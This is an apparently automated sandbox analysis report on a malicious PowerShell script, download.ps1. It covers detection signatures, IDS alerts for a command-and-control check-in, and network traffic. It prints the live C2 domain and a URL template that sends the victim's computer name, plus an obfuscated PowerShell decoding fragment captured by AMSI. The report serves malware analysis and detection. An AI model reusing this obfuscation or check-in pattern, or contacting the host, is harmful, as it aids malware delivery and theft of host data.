Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1589104
MD5:81b74a62ffc263437801f0e3dbc1b1eb
SHA1:f1649560edbc7742352cec091f4dc26922d9bdcb
SHA256:9229403e77c223dc8acb86755f6576ff22ff15362da8b2577a85ed2083205e71
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64native
  • powershell.exe (PID: 8624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 8632 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4924, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 8624, ProcessName: powershell.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4924, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 8624, ProcessName: powershell.exe

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-11T09:45:39.301965+010020283713Unknown Traffic192.168.11.305279923.45.46.170443TCP
2025-01-11T09:46:42.801954+010020283713Unknown Traffic192.168.11.305280323.45.46.170443TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-11T09:45:40.368167+010020577411A Network Trojan was detected192.168.11.305280045.61.136.13880TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-11T09:45:40.368167+010018100002Potentially Bad Traffic192.168.11.305280045.61.136.13880TCP
2025-01-11T09:45:40.726140+010018100002Potentially Bad Traffic192.168.11.3052801142.250.191.19680TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for submitted file
Source: download.ps1Virustotal: Detection: 15%Perma Link
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000001.00000002.36318893418.00000257B4526000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.36318893418.00000257B4526000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb[B}X source: powershell.exe, 00000001.00000002.36324659770.00000257B48AE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdb source: powershell.exe, 00000001.00000002.36322503212.00000257B47BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BF0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000001.00000002.36318893418.00000257B44D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000001.00000002.36322503212.00000257B4829000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb{ source: powershell.exe, 00000001.00000002.36322503212.00000257B4829000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdb(h source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdbS source: powershell.exe, 00000001.00000002.36326314777.00000257B4BFE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.Management.Automation.pdbpdb source: powershell.exe, 00000001.00000002.36325370755.00000257B4BCC000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior

Networking

barindex
Suricata IDS alerts for network traffic
Source: Network trafficSuricata IDS: 2057741 - Severity 1 - ET MALWARE TA582 CnC Checkin : 192.168.11.30:52800 -> 45.61.136.138:80
Queries Google from non browser process on port 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: Joe Sandbox ViewASN Name: AS40676US AS40676US
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:52799 -> 23.45.46.170:443
Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.11.30:52803 -> 23.45.46.170:443
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:52800 -> 45.61.136.138:80
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.11.30:52801 -> 142.250.191.196:80
Source: global trafficHTTP traffic detected: GET /36aol1ybpfhtr.php?id=computer&key=67225157272&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kmaealcfcalhcac.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /36aol1ybpfhtr.php?id=computer&key=67225157272&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: kmaealcfcalhcac.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><span equals www.youtube.com (Youtube)
Source: powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanXz equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: kmaealcfcalhcac.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579E3C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$9bsu5ro72hgpqxk/$x4dbnkmt7rp9vl2.php?id=$env:computername&key=$dekctvjq&s=527
Source: powershell.exe, 00000001.00000002.36318893418.00000257B4501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000001.00000002.36318893418.00000257B44D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000001.00000002.36318893418.00000257B4526000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft.
Source: powershell.exe, 00000001.00000002.36318893418.00000257B4501000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.v
Source: powershell.exe, 00000001.00000002.36241645195.000002579CF8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kmaealcfcalhcac.top
Source: powershell.exe, 00000001.00000002.36241645195.000002579CF8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://kmaealcfcalhcac.top/36aol1ybpfhtr.php?id=computer&key=67225157272&s=527
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000001.00000002.36241645195.000002579F533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579F37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.pngh
Source: powershell.exe, 00000001.00000002.36241645195.000002579D711000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D725000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC65F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D675000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3CD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D72E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D720000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3C9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D71B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D732000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D3D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D716000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000001.00000002.36241645195.000002579C361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579F37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlh
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000001.00000002.36241645195.000002579D114000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D439000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=en
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000001.00000002.36241645195.000002579C361000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000001.00000002.36305951926.00000257AC65F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.comXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D114000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.36241645195.000002579C58B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579F37F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579F3C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pesterh
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24XI
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24Xz
Source: powershell.exe, 00000001.00000002.36305951926.00000257AC65F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC5D2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC540000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96Xz
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000001.00000002.36241645195.000002579F533000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36305951926.00000257AC3D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000001.00000002.36241645195.000002579F368000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=wh
Source: powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000001.00000002.36241645195.000002579D143000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comXz
Source: powershell.exe, 00000001.00000002.36241645195.000002579D760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.36241645195.000002579D293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: classification engineClassification label: mal72.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8632:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0zuclxt1.twn.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $2hk5joxacz80mi3.(([char[]]@((-7788+7855),(2142-(1655265/(4201325/(11789485/2287)))),(5896-5784),(9748-(47855817/4971)),(6494-(4206+(-1188+3392))),(344988/(31608360/(10006+(387040/(2088+(9123-8851))))))) -join ''))( $s98nu1tql0hxpyj ) $2hk5joxacz80mi3.((-join (@((-8433+8500),(3813-(2078+(6773201/(8288-4125)))),(320346/2886),(988770/(9710-(338048/304))),(129381/(9729-(53847552/(40443030/(10220-(15341125/3959)))))))| ForEach-Object { [char]$_ })))()$hmjer3wv2f7ykpl.(([char[]]@((383374/5722),(6167-(-185+(5809+435))),(-7725+7836),(-11+126),(10126-10025)) -join ''))()[byte[]] $gcw81akx7l463u2 = $s98nu1tql0hxpyj.(([char[]]@((-5268+5352),(3362-3251),(-4718+4783),(308712/(3749-1041)),(869136/(4966+2658)),(518562/(40511988/7578)),(5654-5533)) -join ''))() $u16t4qil590pz7d=$gcw81akx7l463u2 return $u16t4qil590pz7d}[System.Text.Encoding]::ascii.((-join (@((613582/8642),(-1445+1546),(715604/6169),(1738-(-7707+(66329770/(23104185/(4452-(4870-(-2231+(2609+(633792/192))))))))),(868376/(-369+7855)),(603288/5292),(2806-2701),(485-375),(150380/(7289-(12057-6228))))| ForEach-Object { [char]$_ })))((fm3l96o5ykb4tr27s0nvzqhwaiu 